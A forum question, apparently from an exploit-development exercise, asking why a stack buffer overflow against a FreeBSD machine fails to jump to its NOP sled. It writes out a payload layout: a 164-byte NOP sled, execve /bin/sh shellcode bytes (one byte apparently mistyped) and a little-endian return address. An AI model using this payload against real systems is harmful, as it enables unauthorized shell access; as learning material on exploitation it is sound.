So I am trying to implement a buffer overflow to get shell access to a buggy machine.

The machine is

• freebsd
• little endian byte reading
• String length is 200 which causes the overflow.

Now after consulting http://shell-storm.org/shellcode/files/shellcode-106.php to get a shellcode for /bin/sh and modifying the string, this is what I made

NO-Ops: "\x90"x164

SHELLCODE: "\x48\x31\xc0\x99\xb0\x3b\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08x57\x48\x89\xe7\x57\x52\x48\x89\xe6\x0f\x05";print

Address to jump to :"\x68\xea\xff\xff\xff\x7f";' # 0x7fffffffea68 is in the middle of the No-Ops.

The problem is, I can get my EIP to point to 0x7fffffffea68 exactly. However when the segmentation fault occurs, the address shows up as 0x00007fffffffae68. How do I navigate to the address 0x7fffffffea68 as it shows up without the 4 zeros when I look at the registers from the stack pointer ? The address is correct but can not jump there as it is "incorrect".

This is how the address shows up during segmentation fault. (ignore ea/ae here, the problem is same both ways)

Here is the output of info registers.

Here is how it appears on the dump (to show the intended address).

I do not understand where I am going wrong with this. The likely answer is the address to jump to so I tried making various changes to the lengths and where to jump to. It still does not work.

The second could be the shellcode but I put my money on the length. I need help to understand where I might be wrong and how I can go about mitigating this problem. Thanks.